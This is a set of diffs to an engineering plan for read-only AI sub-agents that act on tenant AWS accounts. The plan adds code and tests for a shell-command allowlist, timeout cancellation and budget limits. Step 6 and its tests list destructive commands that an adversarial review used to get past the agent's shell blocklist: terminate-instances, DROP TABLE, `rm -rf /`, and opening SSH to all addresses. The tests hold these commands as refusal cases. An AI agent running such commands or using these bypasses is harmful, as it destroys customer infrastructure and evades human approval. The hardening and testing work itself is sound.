+```
+
+And render the transcript below the findings block inside the `expanded` branch:
+
+```tsx
+          {transcript && transcript.length > 0 && (
+            <div className="mt-3 border-t pt-2">
+              <p className="mb-1 text-xs font-medium text-muted-foreground">Transcript</p>
+              <div className="space-y-1.5">
+                {transcript.map((entry, i) => (
+                  <div key={i} className="text-xs">
+                    <span className="text-muted-foreground">
+                      {entry.kind === 'tool' ? `${entry.name ?? 'tool'} → ` : 'thinking: '}
+                    </span>
+                    <span className="whitespace-pre-wrap">{entry.text}</span>
+                  </div>
+                ))}
+              </div>
+            </div>
+          )}
+```
+
+`run-rail.tsx` already passes `threadId` into `SubagentCard` (Task 10, Step 7), so no further wiring is needed here.
+
+- [ ] **Step 10: Verify end to end**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit` — no new errors.
+Run: `cd apps/web-ui && bun run lint` — no new errors.
+Run: `cd apps/web-ui && bun run test` — full suite, no new failures.
+
+Manually: run a fan-out task, wait for completion, **reload the page**, expand a sub-agent card, and confirm the task, findings, and transcript all render from the persisted row.
+
+- [ ] **Step 11: Commit**
+
+```bash
+git add libs/prisma/schema.prisma libs/prisma/migrations apps/web-ui/lib/db/repositories/subagent apps/web-ui/lib/db/repository-factory.ts apps/web-ui/app/api/chat/subagents apps/web-ui/app/api/chat/route.ts apps/web-ui/components/agent/chat/subagent-card.tsx apps/web-ui/components/agent/chat/run-rail.tsx
+git commit -m "feat(chat): persist sub-agent transcripts for expansion after reload
+
+Transcripts live in agent_subagent_runs (30-day TTL) and are fetched on demand,
+never carried in the dispatch_agent ToolMessage — that message enters the
+orchestrator's context and would undo the isolation sub-agents exist to give."
+```
+
+---
+
+## Final verification
+
+- [ ] Run the full web-ui suite: `cd apps/web-ui && bun run test`. Compare failures against the pre-Task-1 baseline; there must be no new ones.
+- [ ] Run `cd apps/web-ui && bunx tsc --noEmit` and `bun run lint` — clean.
+- [ ] Re-run the representative slow task from Task 2 Step 8 with `SUBAGENTS_ENABLED=true` and sub-agents enabled for the tenant. Record the `📊 [RUN SUMMARY]` and compare against both the Task 2 baseline and the Task 3 measurement.
+- [ ] Confirm the safety property by inspection: with sub-agents enabled, ask the agent to stop an EC2 instance across several accounts. Every mutation must still surface in the approval card — no mutation may occur inside a sub-agent.

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -401,6 +401,33 @@ describe('run timings', () => {
     it('returns null for an unknown thread', () => {
         expect(summarizeRun('never-seen')).toBeNull();
     });
+
+    it('does not evict a run that is still recording', () => {
+        // The eviction backstop must target the most IDLE run, not the
+        // oldest-started one. A 10-minute agent run is exactly the run whose
+        // numbers matter most, and it is also the one that has been in the map
+        // longest — evicting it would silently discard the measurement.
+        recordNodeTiming('long-runner', 'EXECUTOR', 1000, 10, 10);
+
+        // Fill past capacity with other threads, while the long runner keeps working.
+        for (let i = 0; i < 250; i++) {
+            recordNodeTiming(`other-${i}`, 'EXECUTOR', 1, 1, 1);
+            recordNodeTiming('long-runner', 'EXECUTOR', 1000, 10, 10);
+        }
+
+        const summary = summarizeRun('long-runner');
+        expect(summary).not.toBeNull();
+        expect(summary!.byNode.EXECUTOR.calls).toBe(251);
+    });
+
+    it('still bounds the map when runs never reach teardown', () => {
+        for (let i = 0; i < 300; i++) {
+            recordNodeTiming(`abandoned-${i}`, 'EXECUTOR', 1, 1, 1);
+        }
+        // The earliest abandoned runs must have been evicted.
+        expect(summarizeRun('abandoned-0')).toBeNull();
+        expect(summarizeRun('abandoned-299')).not.toBeNull();
+    });
 });
 ```
 
@@ -457,13 +484,18 @@ export function recordNodeTiming(
     let byNode = runs.get(threadId);
     if (!byNode) {
         if (runs.size >= MAX_TRACKED_RUNS) {
-            // Evict the oldest insertion — Map preserves insertion order.
             const oldest = runs.keys().next().value;
             if (oldest !== undefined) runs.delete(oldest);
         }
         byNode = {};
-        runs.set(threadId, byNode);
+    } else {
+        // Refresh position: Map keeps INSERTION order, and .set() on an
+        // existing key does not move it. Without this, eviction targets the
+        // oldest-STARTED run — which is exactly the long run we most want to
+        // measure. Delete-then-set makes it least-recently-ACTIVE.
+        runs.delete(threadId);
     }
+    runs.set(threadId, byNode);
 
     const entry = byNode[node] ?? { calls: 0, ms: 0, tokensIn: 0, tokensOut: 0 };
     entry.calls += 1;

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -1841,7 +1841,7 @@ export function AiopsSubagentSettings() {
 
       <Button type="submit" disabled={saveMutation.isPending || !platformEnabled}>
         {saveMutation.isPending ? (
-          <Spinner className="h-4 w-4 mr-2" />
+          <Spinner size="sm" className="mr-2" />
         ) : (
           <Save className="h-4 w-4 mr-2" />
         )}

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -1995,6 +1995,16 @@ describe('isReadOnlyForSubagent', () => {
     it('blocks ask_user — no human is reachable inside a tool call', () => {
         expect(isReadOnlyForSubagent('ask_user').allowed).toBe(false);
     });
+
+    it('blocks denylisted tools regardless of case', () => {
+        // classifyTool lowercases internally, so once dispatch_agent joins its
+        // READ_ONLY_ALLOWLIST (Task 8) a case-sensitive denylist would let
+        // "Dispatch_Agent" through as allowlisted-read-only — re-enabling
+        // sub-agent recursion. Pin the lowercasing.
+        for (const name of ['Dispatch_Agent', 'DISPATCH_AGENT', 'Ask_User', 'ASK_USER']) {
+            expect(isReadOnlyForSubagent(name).allowed).toBe(false);
+        }
+    });
 });
 
 describe('filterReadOnlyTools', () => {
@@ -2172,7 +2182,12 @@ export function isReadOnlyForSubagent(
     name: string,
     args?: Record<string, unknown>,
 ): { allowed: boolean; reason: string } {
-    if (SUBAGENT_TOOL_DENYLIST.has(name)) {
+    // Lowercased: classifyTool() lowercases internally, so once Task 8 adds
+    // dispatch_agent to its READ_ONLY_ALLOWLIST a case variant like
+    // "Dispatch_Agent" would miss a case-SENSITIVE denylist and then be waved
+    // through as allowlisted-read-only. The tool-name lookup below would still
+    // catch it, but a safety boundary must not depend on its own backstop.
+    if (SUBAGENT_TOOL_DENYLIST.has(name.toLowerCase())) {
         return { allowed: false, reason: `${name} is not available to sub-agents` };
     }
 

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -2390,6 +2390,385 @@ dispatch_agent (depth cap 1) and ask_user (no human inside a tool call), so
 LangGraph's inability to interrupt mid-tool-call is never a safety hole."
 ```
 
+- [ ] **Step 6: Replace the shell blocklist with an allowlist (CRITICAL)**
+
+Added after an adversarial review broke the shell layer 23 different ways. **This is a
+design error in the spec above, not an implementation slip.**
+
+The spec assumed `classifyTool`'s fail-closed default (`matchedRule: false`) covered
+shell commands. It does not. For bash-like tool names `classifyTool` returns
+`{ isMutative: false, matchedRule: **true**, reason: 'read-only bash command' }` for
+*any* command string that misses its seven `MUTATIVE_BASH_PATTERNS` regexes
+(`tool-classifier.ts:178`). So `isReadOnlyForSubagent`'s `!matchedRule` branch — this
+task's entire premise — **is unreachable for `execute_command`**. Shell was gated by a
+blocklist, and inside a tool call (where LangGraph cannot interrupt and no human can
+approve) a blocklist is not a boundary.
+
+Proven bypasses, all classified read-only, all reaching `/bin/bash` with live tenant
+AWS credentials via `buildCommandEnv(tenantId)`:
+
+```
+aws --region us-east-1 ec2 terminate-instances --instance-ids i-1   # a flag before the service
+aws ec2 "terminate-instances" --instance-ids i-1                    # one quote
+aws ec2 authorize-security-group-ingress --port 22 --cidr 0.0.0.0/0 # verb absent from the list
+aws s3 sync ./evil s3://prod-bucket --delete
+aws kms schedule-key-deletion --key-id k --pending-window-in-days 7
+pulumi destroy --yes                                                # binary need not be aws
+python3 -c "import boto3; boto3.client('ec2').terminate_instances(InstanceIds=['i-1'])"
+psql $DATABASE_URL -c "DROP TABLE accounts"
+rm -r /app/data                                                     # only `rm -rf` was patterned
+```
+
+The fix lives in `subagent.ts` only. **Do not touch `tool-classifier.ts`** — the guard
+node depends on its current behaviour for the human-approval path, where ambiguity
+correctly routes to a person.
+
+Add to `apps/web-ui/lib/agent/subagent.ts`, above `isReadOnlyForSubagent`:
+
+```typescript
+/**
+ * Shell commands are ALLOWLISTED, not blocklisted.
+ *
+ * classifyTool treats any bash-like call that misses its mutative regexes as
+ * "read-only bash command" WITH matchedRule: true — so the fail-closed
+ * !matchedRule rule never fires for shell. That is adequate for the guard node
+ * (a human reviews the call) but not here: a sub-agent runs inside a tool call,
+ * which LangGraph cannot interrupt, so nothing downstream can stop the command.
+ *
+ * An adversarial review escaped the blocklist 23 ways — a flag before the
+ * service name, a quote around the verb, a verb missing from the list, or simply
+ * a different binary (pulumi, psql, python3). Enumerating mutations is
+ * unwinnable; enumerating the reads we actually need is not.
+ */
+const SHELL_TOOL_NAMES = new Set(['bash', 'shell', 'run_command', 'execute_command']);
+
+/** Metacharacters that allow chaining, substitution, or redirection out of the allowlist. */
+const SHELL_METACHAR = /[;&|`$><\n\r]/;
+
+/** Binaries a sub-agent may invoke at all. */
+const ALLOWED_SHELL_BINARIES = new Set([
+    'aws', 'kubectl', 'cat', 'ls', 'grep', 'head', 'tail', 'wc', 'jq', 'echo',
+]);
+
+/** AWS operation prefixes that are read-only by CLI convention. */
+const READ_ONLY_AWS_OP_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+
+/** Read-only AWS operations that do not follow the prefix convention. */
+const READ_ONLY_AWS_OP_EXACT = new Set(['ls', 'filter-log-events', 'query', 'scan', 'help']);
+
+/** Read-only kubectl verbs. */
+const READ_ONLY_KUBECTL_VERBS = new Set([
+    'get', 'describe', 'logs', 'top', 'version', 'api-resources', 'explain',
+]);
+
+/** Strip one layer of surrounding quotes: `aws ec2 "terminate-instances"` must not hide the verb. */
+function unquote(token: string): string {
+    return token.replace(/^['"]|['"]$/g, '');
+}
+
+/**
+ * Resolve the command string from a bash-like tool's args. Returns null when the
+ * args carry no usable command — an array, a number, an empty object. classifyTool
+ * fails open on `{}` and stringifies an array into a comma-joined string that
+ * matches no pattern, so both must be refused here.
+ */
+export function resolveShellCommand(args?: Record<string, unknown>): string | null {
+    for (const key of ['command', 'cmd', 'input']) {
+        const value = args?.[key];
+        if (typeof value === 'string' && value.trim().length > 0) return value;
+        if (value !== undefined) return null; // present but not a usable string
+    }
+    return null;
+}
+
+/** Allowlist verdict for one shell command string. */
+export function isReadOnlyShellCommand(cmd: string): { allowed: boolean; reason: string } {
+    if (SHELL_METACHAR.test(cmd)) {
+        return { allowed: false, reason: 'command contains shell metacharacters (chaining, substitution, or redirection)' };
+    }
+
+    // Quotes are stripped per token, so splitting on whitespace is sufficient once
+    // metacharacters are already refused.
+    const tokens = cmd.trim().split(/\s+/).map(unquote).filter(t => t.length > 0);
+    // Drop leading VAR=value assignments (`AWS_PROFILE=x aws ...`).
+    while (tokens.length > 0 && /^[A-Za-z_][A-Za-z0-9_]*=/.test(tokens[0])) tokens.shift();
+    if (tokens.length === 0) return { allowed: false, reason: 'empty command' };
+
+    const binary = tokens[0];
+    if (!ALLOWED_SHELL_BINARIES.has(binary)) {
+        return { allowed: false, reason: `binary "${binary}" is not on the sub-agent read-only allowlist` };
+    }
+
+    if (binary === 'aws') {
+        // Walk past global flags AND their values to find <service> then <operation>.
+        // This is what defeated the old regex: it assumed `aws <service> <verb>` adjacency.
+        const positional: string[] = [];
+        for (let i = 1; i < tokens.length; i++) {
+            const token = tokens[i];
+            if (token.startsWith('-')) {
+                // A flag's value is the next token when it is not itself a flag.
+                if (i + 1 < tokens.length && !tokens[i + 1].startsWith('-')) i++;
+                continue;
+            }
+            positional.push(token);
+            if (positional.length === 2) break;
+        }
+        const operation = positional[1];
+        if (!operation) return { allowed: false, reason: 'aws command has no resolvable operation' };
+        if (!READ_ONLY_AWS_OP_PREFIX.test(operation) && !READ_ONLY_AWS_OP_EXACT.has(operation)) {
+            return { allowed: false, reason: `aws operation "${operation}" is not a verified read-only operation` };
+        }
+        return { allowed: true, reason: `aws read-only operation "${operation}"` };
+    }
+
+    if (binary === 'kubectl') {
+        const verb = tokens.slice(1).find(t => !t.startsWith('-'));
+        if (!verb || !READ_ONLY_KUBECTL_VERBS.has(verb)) {
+            return { allowed: false, reason: `kubectl verb "${verb ?? '(none)'}" is not read-only` };
+        }
+        return { allowed: true, reason: `kubectl read-only verb "${verb}"` };
+    }
+
+    return { allowed: true, reason: `read-only utility "${binary}"` };
+}
+```
+
+Then, in `isReadOnlyForSubagent`, intercept bash-like tools **before** delegating to
+`classifyTool`. Insert immediately after the denylist check:
+
+```typescript
+    // Shell is allowlisted here rather than delegated to classifyTool, whose
+    // bash handling is a blocklist that reports matchedRule: true on a miss.
+    if (SHELL_TOOL_NAMES.has(name.toLowerCase())) {
+        const cmd = resolveShellCommand(args);
+        if (cmd === null) {
+            return { allowed: false, reason: `${name} called without a usable command string` };
+        }
+        const verdict = isReadOnlyShellCommand(cmd);
+        return verdict.allowed
+            ? { allowed: true, reason: verdict.reason }
+            : { allowed: false, reason: `shell call refused: ${verdict.reason}` };
+    }
+```
+
+- [ ] **Step 7: Make the timeout actually cancel the loop (IMPORTANT)**
+
+`Promise.race` abandons `runSubagentLoop` but nothing stops it. Measured: `runSubagent`
+returned after 2 model calls while the orphaned loop ran **8 more model calls and 9 more
+tool calls** against customer AWS — invisible to `maxSubagentTokensPerRun`, and with
+Task 8's concurrency semaphore already released, so real concurrency exceeds its cap.
+
+Give the loop a cancellation token and shared progress. Change `runSubagentLoop`'s
+signature to accept a control object:
+
+```typescript
+interface SubagentControl {
+    cancelled: boolean;
+    progress: { toolCount: number; tokensIn: number; tokensOut: number };
+}
+```
+
+Inside the loop, update `control.progress` wherever the local counters are updated, and
+bail at two checkpoints — the top of each lap and immediately before each tool invoke:
+
+```typescript
+        if (control.cancelled) {
+            return {
+                report: finishReport(lastText, 'CANCELLED — the sub-agent exceeded its time limit. Findings above are partial.'),
+                toolCount, tokensIn, tokensOut, status: 'done', transcript,
+            };
+        }
+```
+
+In `runSubagent`, create the control object, pass it in, and on the timeout branch set
+`control.cancelled = true` and report the REAL usage from `control.progress` rather than
+hardcoded zeros (the same applies to the catch branch):
+
+```typescript
+        if (outcome === 'timeout') {
+            control.cancelled = true;
+            return {
+                report: finishReport('', `TIMED OUT after ${Math.round(timeoutMs / 1000)}s — no findings were returned in time.`),
+                toolCount: control.progress.toolCount,
+                tokensIn: control.progress.tokensIn,
+                tokensOut: control.progress.tokensOut,
+                status: 'failed', transcript: [],
+            };
+        }
+```
+
+Also move the `const timeoutMs = deps.budget.subagentTimeoutMs` read **inside** the
+`try` — it currently sits outside, so a malformed `deps.budget` throws out of a function
+whose contract is that it never throws.
+
+And replace the `toolCount` string-sniffing (`if (!output.startsWith('REFUSED:'))`) with
+a boolean carried from the verdict — a real tool whose output happens to begin with
+`REFUSED:` (an echoed IAM denial) currently goes uncounted.
+
+- [ ] **Step 8: Add the bypass regression tests**
+
+Every command below is a **proven** bypass of the old blocklist, so these tests have
+teeth by construction. Add to `subagent.test.ts`:
+
+```typescript
+describe('shell allowlist — proven bypasses of the old blocklist', () => {
+    const REFUSED = [
+        'aws --region us-east-1 ec2 terminate-instances --instance-ids i-1',
+        'aws --profile prod ec2 stop-instances --instance-ids i-1',
+        'aws ec2 "terminate-instances" --instance-ids i-1',
+        "aws ec2 'delete-security-group' --group-id sg-1",
+        'aws ec2 authorize-security-group-ingress --group-id sg-1 --port 22 --cidr 0.0.0.0/0',
+        'aws ecs execute-command --cluster c --task t --command /bin/sh',
+        'aws s3 sync ./evil s3://prod-bucket --delete',
+        'aws s3 cp ./evil.sh s3://prod-bucket/boot.sh',
+        'aws rds restore-db-instance-from-db-snapshot --db-instance-identifier x',
+        'aws kms schedule-key-deletion --key-id k --pending-window-in-days 7',
+        'aws cloudformation cancel-update-stack --stack-name s',
+        'pulumi up --stack prod --yes',
+        'pulumi destroy --yes',
+        'python3 -c import boto3',
+        'rm important.tf',
+        'rm -r /app/data',
+        'kubectl run evil --image=alpine',
+        'kubectl delete pod x',
+        'npm run deploy:prod',
+        'bash deploy.sh',
+        'node ./scripts/wipe.js',
+        'echo pwned > /app/config.json',                 // metacharacter
+        'aws ec2 describe-instances && rm -rf /',         // metacharacter
+        'aws ec2 describe-instances; pulumi destroy',     // metacharacter
+        'aws ec2 describe-instances $(rm -rf /)',         // metacharacter
+    ];
+
+    for (const cmd of REFUSED) {
+        it(`refuses: ${cmd}`, () => {
+            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(false);
+        });
+    }
+
+    const ALLOWED = [
+        'aws ec2 describe-instances --output json',
+        'aws --region us-east-1 ec2 describe-instances',
+        'AWS_PROFILE=nucleus_agent_1 aws ec2 describe-instances',
+        'aws --profile p --region r rds describe-db-instances',
+        'aws sts get-caller-identity',
+        'aws cloudwatch get-metric-statistics --metric-name CPUUtilization',
+        'aws logs filter-log-events --log-group-name x',
+        'aws s3 ls s3://bucket',
+        'kubectl get pods -n default',
+        'kubectl describe pod x',
+        'kubectl logs pod/x',
+        'cat /tmp/report.json',
+        'ls -la /tmp',
+        'grep -r error /var/log',
+        'jq .Reservations /tmp/out.json',
+    ];
+
+    for (const cmd of ALLOWED) {
+        it(`allows: ${cmd}`, () => {
+            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(true);
+        });
+    }
+
+    it('refuses a bash-like call with no usable command string', () => {
+        // classifyTool fails OPEN on {} and stringifies an array into a
+        // comma-joined string that matches no mutative pattern.
+        expect(isReadOnlyForSubagent('execute_command', {}).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', undefined).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', { command: ['aws', 'ec2', 'terminate-instances'] } as never).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', { command: '' }).allowed).toBe(false);
+        expect(isReadOnlyForSubagent('execute_command', { command: 0 } as never).allowed).toBe(false);
+    });
+
+    it('applies the allowlist to every bash-like tool name, any case', () => {
+        for (const name of ['bash', 'shell', 'run_command', 'EXECUTE_COMMAND', 'Bash']) {
+            expect(isReadOnlyForSubagent(name, { command: 'pulumi destroy --yes' }).allowed).toBe(false);
+            expect(isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
+        }
+    });
+});
+
+describe('timeout cancellation', () => {
+    it('stops the loop instead of leaving it running', async () => {
+        let laps = 0;
+        const model: any = {
+            bindTools: () => model,
+            invoke: async () => {
+                laps++;
+                await new Promise(r => setTimeout(r, 30));
+                return { content: '', tool_calls: [{ id: `${laps}`, name: 'describe_instances', args: {} }], usage_metadata: { input_tokens: 10, output_tokens: 5 } };
+            },
+        };
+        const tool = { name: 'describe_instances', invoke: async () => 'ok' };
+
+        await runSubagent(SPEC, { model, tools: [tool], budget: { ...BUDGET, subagentMaxIterations: 20, subagentTimeoutMs: 60 } });
+        const lapsAtReturn = laps;
+
+        // If the loop were abandoned rather than cancelled it would keep going.
+        await new Promise(r => setTimeout(r, 300));
+        expect(laps).toBeLessThanOrEqual(lapsAtReturn + 1);
+    });
+
+    it('reports real usage on timeout rather than zeros', async () => {
+        const model: any = {
+            bindTools: () => model,
+            invoke: async () => {
+                await new Promise(r => setTimeout(r, 30));
+                return { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }], usage_metadata: { input_tokens: 100, output_tokens: 20 } };
+            },
+        };
+        const tool = { name: 'describe_instances', invoke: async () => 'ok' };
+
+        const result = await runSubagent(SPEC, { model, tools: [tool], budget: { ...BUDGET, subagentMaxIterations: 20, subagentTimeoutMs: 80 } });
+        expect(result.tokensIn).toBeGreaterThan(0);
+    });
+});
+
+describe('runSubagent totality', () => {
+    it('does not throw on a malformed budget', async () => {
+        const model: any = { bindTools: () => model, invoke: async () => ({ content: 'x', tool_calls: [] }) };
+        await expect(
+            runSubagent(SPEC, { model, tools: [], budget: undefined as never }),
+        ).resolves.toMatchObject({ status: 'failed' });
+    });
+});
+
+describe('hallucinated tool names', () => {
+    it('refuses a tool that passes the jail but is not in the tool list', async () => {
+        // The second layer's whole purpose: the model invents a name it was never given.
+        const model: any = {
+            bindTools: () => model,
+            invoke: vi.fn()
+                .mockResolvedValueOnce({ content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }], usage_metadata: {} })
+                .mockResolvedValueOnce({ content: 'Could not read it.', tool_calls: [], usage_metadata: {} }),
+        };
+        const result = await runSubagent(SPEC, { model, tools: [], budget: BUDGET });
+        expect(result.status).toBe('done');
+        expect(result.transcript.some(e => e.text.includes('REFUSED'))).toBe(true);
+    });
+});
+```
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent.test.ts`
+
+```bash
+git add apps/web-ui/lib/agent/subagent.ts apps/web-ui/lib/agent/subagent.test.ts
+git commit -m "fix(agent): allowlist sub-agent shell commands and cancel on timeout
+
+An adversarial review escaped the shell blocklist 23 ways: a flag before the
+service name, a quote around the verb, a verb missing from the pattern list, or
+simply a different binary (pulumi, psql, python3). classifyTool reports
+matchedRule:true for any bash command that misses its regexes, so the
+fail-closed rule never applied to shell — and a sub-agent runs inside a tool
+call, where LangGraph cannot interrupt and no human can approve.
+
+Replace it with an allowlist: refuse shell metacharacters, then require an
+allowlisted binary and a read-only operation resolved by tokenising past global
+flags. Also cancel the loop on timeout (it previously ran on unsupervised,
+spending untracked tokens), refuse bash-like calls with no usable command
+string, and report real usage on the timeout path."
+```
+
 ---
 
 ### Task 8: `dispatch_agent` tool and orchestrator wiring

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -3201,10 +3201,21 @@ export function createDispatchAgentTool(deps: DispatchAgentDeps) {
             }
 
             const id = randomUUID();
-            const emit = (event: Partial<SubagentEvent> & Pick<SubagentEvent, 'status'>) =>
-                deps.onSubagentEvent?.({
-                    id, role, task, toolCount: 0, tokensIn: 0, tokensOut: 0, ...event,
-                });
+            // The sink is supplied by the caller (the chat route enqueues onto a
+            // ReadableStream, which throws once the client disconnects). Swallow
+            // here rather than at each call site: the first emit runs before the
+            // try below, so a throwing sink would otherwise reject the tool call
+            // itself — consuming a budget reservation and handing the model a
+            // "fix your mistakes" error instead of the do-it-yourself instruction.
+            const emit = (event: Partial<SubagentEvent> & Pick<SubagentEvent, 'status'>) => {
+                try {
+                    deps.onSubagentEvent?.({
+                        id, role, task, toolCount: 0, tokensIn: 0, tokensOut: 0, ...event,
+                    });
+                } catch (err) {
+                    console.warn(`[dispatch_agent] progress sink threw (ignored): ${err instanceof Error ? err.message : String(err)}`);
+                }
+            };
 
             emit({ status: 'running' });
 

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -1025,6 +1025,15 @@ describe('clampBudget', () => {
         process.env.SUBAGENT_MAX_CONCURRENCY = '2';
         expect(clampBudget({ maxConcurrentSubagents: 6 }).maxConcurrentSubagents).toBe(2);
     });
+
+    it('IGNORES an env ceiling above the built-in max', () => {
+        // The load-bearing multi-tenant isolation invariant: web-ui is a shared
+        // ECS task, so no operator misconfiguration may let a tenant exceed the
+        // hard cap and saturate the box for co-tenants.
+        process.env.SUBAGENT_MAX_CONCURRENCY = '100';
+        expect(clampBudget({ maxConcurrentSubagents: 100 }).maxConcurrentSubagents)
+            .toBe(BUDGET_BOUNDS.maxConcurrentSubagents.max);
+    });
 });
 
 describe('resolveSubagentBudget', () => {
@@ -1076,6 +1085,17 @@ describe('validateBudgetInput', () => {
         expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: 999 }))
             .toMatch(/maxConcurrentSubagents/);
     });
+
+    it('rejects non-number types rather than coercing them', () => {
+        // This function guards the PUT /api/settings/aiops trust boundary, so it
+        // must not accept `true` as 1 or "3" as 3.
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: true }))
+            .toMatch(/maxConcurrentSubagents/);
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: '3' }))
+            .toMatch(/maxConcurrentSubagents/);
+        expect(validateBudgetInput({ enabled: true, maxConcurrentSubagents: null }))
+            .toMatch(/maxConcurrentSubagents/);
+    });
 });
 ```
 
@@ -1094,7 +1114,7 @@ Create `apps/web-ui/lib/agent/subagent-budget.ts`:
  *
  * web-ui runs as a SHARED ECS task, so these limits cannot be purely
  * tenant-controlled: one tenant setting concurrency to 50 would saturate the
- * container's event loop for every co-tenant and flood their Bedrock quota.
+ * container's event loop for every co-tenant and flood their LLM provider quota.
  * Env vars are therefore CEILINGS, not overrides:
  *
  *     effective = clamp(tenantConfig ?? default, MIN, envCeiling)
@@ -1192,6 +1212,12 @@ export function validateBudgetInput(input: unknown): string | null {
     for (const key of Object.keys(BOUNDS_SPEC) as NumericKey[]) {
         if (body[key] === undefined) continue;
         const spec = BOUNDS_SPEC[key];
+        // Type-check BEFORE coercing: this function is the trust boundary for the
+        // PUT /api/settings/aiops route, and Number() would silently accept
+        // `true` as 1 or "3" as 3.
+        if (typeof body[key] !== 'number') {
+            return `${key} must be a number`;
+        }
         const value = Number(body[key]);
         const ceiling = ceilingFor(key);
         if (!Number.isInteger(value) || value < spec.min || value > ceiling) {

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -334,6 +334,82 @@ write atomically via rename, and cache profiles with refresh-on-near-expiry
 so fan-out does not multiply AssumeRole calls."
 ```
 
+- [ ] **Step 9: Make profile names collision-proof**
+
+Added after Task 3 surfaced this as an intermittent failure of Step 1's
+"re-assumes when the cached profile is near expiry" test (roughly 1 run in 3).
+
+`generateProfileName` derives the name from `Date.now()` alone:
+
+```typescript
+function generateProfileName(accountId: string): string {
+    const timestamp = Date.now();
+    return `${PROFILE_PREFIX}${accountId}_${timestamp}`;
+}
+```
+
+Two profiles for the same account created within the same millisecond therefore
+get **identical names**, and the second silently overwrites the first's section in
+the credentials file — the same lost-profile bug class this task exists to remove,
+just reached by a different route. The mutex cannot help: each call is individually
+serialized and still produces a colliding name. Parallel fan-out (Task 3) and
+parallel sub-agents (Task 8) make same-millisecond creation routine rather than
+theoretical.
+
+Replace it with:
+
+```typescript
+function generateProfileName(accountId: string): string {
+    // Date.now() alone collides when two profiles for one account are created in
+    // the same millisecond — which parallel get_aws_credentials calls do routinely.
+    // A colliding name means the second profile overwrites the first's section and
+    // the first caller's handle silently points at someone else's credentials.
+    return `${PROFILE_PREFIX}${accountId}_${Date.now()}_${randomUUID().slice(0, 8)}`;
+}
+```
+
+`randomUUID` is already imported at the top of the file from Step 3.
+
+Add this regression test to `session-manager.test.ts`, inside the
+`describe('createSessionProfile concurrency', ...)` block:
+
+```typescript
+    it('gives every profile a unique name even within the same millisecond', async () => {
+        // 50 back-to-back creations for ONE account will land many in the same ms.
+        const profiles = await Promise.all(
+            Array.from({ length: 50 }, () => createSessionProfile('999999999999', creds(), TENANT)),
+        );
+
+        const names = new Set(profiles.map(p => p.profileName));
+        expect(names.size).toBe(50);
+
+        // And every one of them must actually be present in the file.
+        const contents = await fs.readFile(getTenantCredentialsFilePath(TENANT), 'utf-8');
+        for (const name of names) {
+            expect(contents).toContain(`[${name}]`);
+        }
+    });
+```
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/session-manager.test.ts` — expect 6/6.
+
+Then run it **five times in a row** and confirm 6/6 every time; the bug this fixes
+is intermittent, so a single green run proves nothing:
+
+```bash
+cd apps/web-ui && for i in 1 2 3 4 5; do bunx vitest run lib/agent/session-manager.test.ts 2>&1 | grep -E "^ +Tests "; done
+```
+
+```bash
+git add apps/web-ui/lib/agent/session-manager.ts apps/web-ui/lib/agent/session-manager.test.ts
+git commit -m "fix(agent): make session profile names collision-proof
+
+Date.now() alone collides when two profiles for one account are created in the
+same millisecond, so the second silently overwrote the first's section — the
+same lost-profile bug the mutex was added to prevent, reached by a different
+route. Surfaced as an intermittent test failure once parallel tool calls landed."
+```
+
 ---
 
 ### Task 2: Per-run timing summary
@@ -730,20 +806,21 @@ export class Semaphore {
     }
 
     async run<T>(fn: () => Promise<T>): Promise<T> {
-        await this.acquire();
+        // Deliberately NOT `await this.acquire()` here: awaiting any promise —
+        // even one already resolved — yields a microtask before continuing, so
+        // a caller that finds a free slot would still run `fn` one tick late.
+        // Callers (and this file's own tests) rely on a free slot starting
+        // `fn` synchronously within the `run()` call.
+        if (this.available > 0) {
+            this.available--;
+        } else {
+            await new Promise<void>(resolve => this.waiters.push(resolve));
+        }
         try {
             return await fn();
         } finally {
             this.release();
         }
-    }
-
-    private acquire(): Promise<void> {
-        if (this.available > 0) {
-            this.available--;
-            return Promise.resolve();
-        }
-        return new Promise<void>(resolve => this.waiters.push(resolve));
     }
 
     private release(): void {

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -2390,383 +2390,355 @@ dispatch_agent (depth cap 1) and ask_user (no human inside a tool call), so
 LangGraph's inability to interrupt mid-tool-call is never a safety hole."
 ```
 
-- [ ] **Step 6: Replace the shell blocklist with an allowlist (CRITICAL)**
+- [ ] **Step 6: Remove shell from sub-agents entirely (CRITICAL)**
 
-Added after an adversarial review broke the shell layer 23 different ways. **This is a
-design error in the spec above, not an implementation slip.**
-
-The spec assumed `classifyTool`'s fail-closed default (`matchedRule: false`) covered
